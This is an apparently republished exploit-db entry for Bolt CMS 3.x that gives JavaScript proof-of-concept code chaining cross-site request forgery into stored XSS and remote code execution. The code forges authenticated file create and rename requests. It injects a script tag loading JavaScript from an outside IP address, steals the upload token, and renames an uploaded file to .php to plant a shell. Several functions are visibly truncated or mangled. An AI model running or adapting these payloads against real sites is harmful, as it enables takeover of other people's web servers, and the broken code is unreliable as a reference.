Exploit/Advisories
Published on October 17th, 2019 📆 | 2153 Views ⚑
0Bolt CMS 3.6.10 – Cross-Site Request Forgery
# Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery
# Date: 2019-10-15
# Exploit Author: r3m0t3nu11[Zero-Way]
# Vendor Homepage: https://bolt.cm/
# Software Link: https://bolt.cm/
# Version: up to date and 6.5
# Tested on: Linux
# CVE : N/A
# last version
# Csrf p0c
Bolt v 3.x exploit 0day
Bolt v 3.x csrf -> xss -> rce exploit
function submitRequest()
{
Csrf = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http://127.0.0.1/index.php/async/folder/create",
true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body = "parent=&foldername=sss&namespace=files";
var aBody = new Uint8Array(body.length);
for (var i = 0; i {
if (xhr.readyState === 4 && xhr.status === 200){
};
JSfuck1();
}
}
JSfuck1 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/async/file/create",
true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 = "filename=aaa&parentPath=sss&namespace=files";
xhr.send(body1);
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
}
};
where();
}
where = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/async/file/rename",
true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body2 =
"namespace=files&parent=sss&oldname=aaa&newname=aaa%3Cscript+src%3D'http%3A%26%23x2f%3B%26%23x2f%3B45.63.42.245%26%23x2f%3Bfinal.js'%3C%26%23x2f%3Bscript%3E.jpg";
xhr.send(body2);
}
Csrf();
}
JS p0c
Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "/index.php/bolt/files", true);
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
token = doc.getElementsByName("file_upload[_token]")[0].value;
upload(token);
console.log(token);
}
};
xhr.send();
}
upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867rn" +
"Content-Disposition: form-data; name="file_upload[select][]";
filename="r3m0t3nu11.txt"rn" +
"Content-Type: text/plainrn" +
"rn" +
"rn" +
"-----------------------------190530466613268610451083392867rn"
+
"Content-Disposition: form-data;
name="file_upload[upload]"rn" +
"rn" +
"rn" +
"-----------------------------190530466613268610451083392867rn"
+
"Content-Disposition: form-data;
name="file_upload[_token]"rn" +
"rn" +
token
"-----------------------------190530466613268610451083392867--rn";
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/bolt/files", true);
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
Shell();
}
};
var aBody = new Uint8Array(body.length);
for (var i = 0; i {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/async/file/rename", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=&oldname=r3m0t3nu11.txt&newname=dd%2Fphp-exif-systemasjpg%2Faa%2Fphp-exif-system.php%2Faaa.jpg";
xhr.send(body1);
bypass();
}
bypass = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/php-exif-system.php%2f&oldname=aaa.jpg&newname=bypass.php";
xhr.send(body1);
bypass2();
}
bypass2 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/&oldname=php-exif-system.php&newname=bypass1";
xhr.send(body1);
}
Token();
version 6.5
CSrf p0c
Bolt v 3.x CVE-2019-17591 exploit
Bolt v 3.x csrf -> xss -> rce exploit
function submitRequest()
{
Csrf = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http://bolt-4mti18.bolt.dockerfly.com/async/file/create",
true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body = "filename=test&parentPath=&namespace=files";
var aBody = new Uint8Array(body.length);
for (var i = 0; i {
if (xhr.readyState === 4 && xhr.status === 200){
JSfuck();
}
};
}
JSfuck = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http://bolt-4mti18.bolt.dockerfly.com/async/file/rename",
true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 = "namespace=files&parent=&oldname=test&newname=";
xhr.send(body1);
}
Csrf();
}
Js p0c
Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "/bolt/files", true);
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
token = doc.getElementsByName("file_upload[_token]")[0].value;
upload(token);
console.log(token);
}
}
xhr.send(null);
}
upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867rn" +
"Content-Disposition: form-data; name="file_upload[select][]";
filename="r3m0t3nu11.txt"rn" +
"Content-Type: text/plainrn" +
"rn" +
"rn" +
"-----------------------------190530466613268610451083392867rn"
+
"Content-Disposition: form-data;
name="file_upload[upload]"rn" +
"rn" +
"rn" +
"-----------------------------190530466613268610451083392867rn"
+
"Content-Disposition: form-data;
name="file_upload[_token]"rn" +
"rn" +
token
"-----------------------------190530466613268610451083392867--rn";
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/bolt/files", true);
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
Shell();
}
};
var aBody = new Uint8Array(body.length);
for (var i = 0; i {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1//async/file/rename", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 =
"namespace=files&parent=%2f&oldname=r3m0t3nu11.txt&newname=b.php";
xhr.send(body1);
}
Token();
proof of concept :
https://drive.google.com/file/d/1TRjzOM-q8cWK1JA9cN1Auhp7Ao3AXtbp/view?usp=sharing
https://drive.google.com/file/d/1QSE7Dnx0XZth9WciaohjhA6nk_-9jCr1/view?usp=sharing
Greetz to :
Samir-dz,YokO,0n3,Mr_Hex,syfi2k,Q8Librarian,Dr_hEx,dracula1337,z0mbi3_h4ck3r,Red
Virus,m7md1337,D3vil1337,and all my friends
https://www.exploit-db.com/exploits/47501
Gloss